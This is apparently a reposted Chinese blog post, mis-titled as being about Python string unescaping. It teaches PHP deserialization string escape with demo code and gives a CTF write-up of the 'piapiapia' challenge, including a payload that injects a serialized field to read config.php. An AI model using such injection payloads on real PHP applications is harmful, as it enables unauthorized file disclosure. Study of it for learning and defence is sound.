python字符串取消转义_python去除字符串的重复字符[通俗易懂]

python字符串取消转义_python去除字符串的重复字符[通俗易懂]一、php反序列化字符串逃逸";$c=unserialize($b);echo$c->pass;?>运行结果:序列化后的字符串应该能看出来,大括号外面有类名及长度,括号里面以分号划分多个变量,包含其变量…

大家好,欢迎来到IT知识分享网。

一、php反序列化字符串逃逸

 

<?php

class user{
    public $user = 'admin';
    public $pass = 'passwd';
}


$a = new user();
$b = serialize($a);

echo $b."<br>";


$c = unserialize($b);

echo $c->pass;



?>

 

运行结果:

python字符串取消转义_python去除字符串的重复字符[通俗易懂]

序列化后的字符串应该能看出来,大括号外面有类名及长度,括号里面以分号划分多个变量,包含其变量名及长度,变量值及长度。

这些都是对应好的,而如果我们对比如user的值进行修改,改为admin1,而长度不变,当反序列化时就会报错。

<?php

    $a = 'O:4:"user":2:{s:4:"user";s:5:"admin1";s:4:"pass";s:6:"passwd";}';
    $b = unserialize($a);
    echo $b->pass;

?>

 

python字符串取消转义_python去除字符串的重复字符[通俗易懂]

我理解的是unserilize()函数是从左往右读入,当读入s:5:时,系统就知道后面引号内是字符串且长度为5,于是从双引号开始读入长度为5的字符,但由于admin1是6个字符,导致后面第6个字符该是双引号来结束,却没有,由此产生异常。而如果我们设置的payload则可以越过这个异常。

 

<?php

function filter($str){
    $str = str_replace("ab","ccc",$str);
    return $str;
}
class user{
    public $user = 'ababababababababababababababababababababababababab";s:4:"pass";s:4:"hack";}';
    public $pass = 'passwd';
}


$a = new user();
echo serialize($a)."<br>";

$b = filter(serialize($a));

echo $b."<br>";

$c = unserialize($b);

echo $c->pass;



?>

 

其中,user的值有25个ab,经序列化后又对其进行替换,每替换一个ab,就多一个字符,这样就可能会导致前面所说的系统知道的长度和实际长度不对应,就会报错,但后面的payload=”;s:4:”pass”;s:4:”hack”;},这样就拼接起来,具体来说

初始序列化后为

O:4:"user":2:{s:4:"user";s:75:"ababababababababababababababababababababababababab";s:4:"pass";s:4:"hack";}";s:4:"pass";s:6:"passwd";}

 

可见长度为75,payload长度是为25,所以这里使用了25个ab,当替换后就多出25个字符。待替换后就为:

O:4:"user":2:{s:4:"user";s:75:"ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc";s:4:"pass";s:4:"hack";}";s:4:"pass";s:6:"passwd";}

你可以知道,c的个数刚好为75个,而系统读入了75个字符想碰到双引号也成功,之后就会继续反序列化我们的payload,而在大括号之后的字符都会被挤进下一个参数中。

 

二、piapiapia

这题打开后测试过不是sql注入后,就用御剑去扫,发现扫不来什么,于是我去下了个大字典,去扫,扫到一半御剑就崩了,,,于是我去实验dirsearch以及dirmap,能扫出www.zip文件,打开后经审计,知道profile.php文件中有一个unserialize函数,而在反序列化之前,有对内部参数进行替换,也正因此我们才有字符串逃逸。同时他反序列化后对photo使用了文件读取函数,在config.php中有flag,那么我们就读取这个文件。

python字符串取消转义_python去除字符串的重复字符[通俗易懂]

hacker是6个字符而where是5个字符,另外nickname长度要小于10,需要用数组来绕过。于是可以构造payload:

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

python字符串取消转义_python去除字符串的重复字符[通俗易懂]

 

这里要注意的是,nickname是一个数组,所以在”;}s:5:这里面要加个大括号,

python字符串取消转义_python去除字符串的重复字符[通俗易懂]

最后,对图片base64解密即可

python字符串取消转义_python去除字符串的重复字符[通俗易懂]

 

 

 

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/29624.html

(0)
上一篇 2023-10-04 17:45
下一篇 2023-10-15 17:45

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注微信